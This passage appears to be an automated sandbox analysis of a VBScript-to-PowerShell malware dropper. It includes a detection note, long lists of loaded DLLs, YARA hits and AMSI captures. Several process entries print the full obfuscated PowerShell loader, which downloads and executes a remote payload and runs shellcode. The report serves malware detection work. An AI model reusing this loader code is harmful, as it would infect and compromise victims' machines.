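The 64-bit to 32-bit respawn is worth a rule of its own: the WMI query `select * from win32_process where ProcessId=...` issued by each PowerShell is how the stage inspects its own process before deciding to relaunch under SysWOW64, and a 32-bit PowerShell child of a 64-bit PowerShell is rare in legitimate administration. Feed `triage` real Sysmon event ID 1 or Security 4688 records (mapped to the same four fields) to run it outside the sandbox.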
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: tem.Core.pdbo source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe, Anti Malware Scan Interface: ShellExecute Uncontemning,Topgrafierne,Tilskikkelsen,Axerophthol ,continuatingISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\DefaultIcon", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ScriptEngine", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ScriptHostEncode", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Edit", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Edit\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open2", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open2\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Print", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Print\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\DropHandler", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\PropertySheetHandlers", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\PropertySheetHandlers\WSHProps", "Unsupported parameter type 00000000");IShellDispatch6.ShellExecute("POWERSHELL", ""If (${host}.CurrentUICulture) {$Afrika", "Unsupported parameter type 00000000", "Unsupported parameter type 00000000", "0")
              Source: Yara match, File source: 00000007.00000002.3337411783.000000000C8EC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000007.00000002.3337285382.0000000008D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000007.00000002.3322827054.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Anti Malware Scan Interface: FromBase64String($Unfoldable)$global:Strmfordelere = [System.Text.Encoding]::ASCII.GetString($Opsamlingsbeholdere)$global:Undetermination=$Strmfordelere.substring($Differ,$Cameroonian)<#Efterabelsen T
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Anti Malware Scan Interface: GetDelegateForFunctionPointer((Kvistlejlighed $Sildeben $Afdryppe), (Hectical @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Forbruskede = [AppDomain]::CurrentDomain.GetAssemblies()$glo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Lange)), $Heterostraca).DefineDynamicModule($Amianthium, $false).DefineType($Timekoder, $Nonspecific, [System.MulticastDelegate])$Chec
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Anti Malware Scan Interface: FromBase64String($Unfoldable)$global:Strmfordelere = [System.Text.Encoding]::ASCII.GetString($Opsamlingsbeholdere)$global:Undetermination=$Strmfordelere.substring($Differ,$Cameroonian)<#Efterabelsen T
              Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf 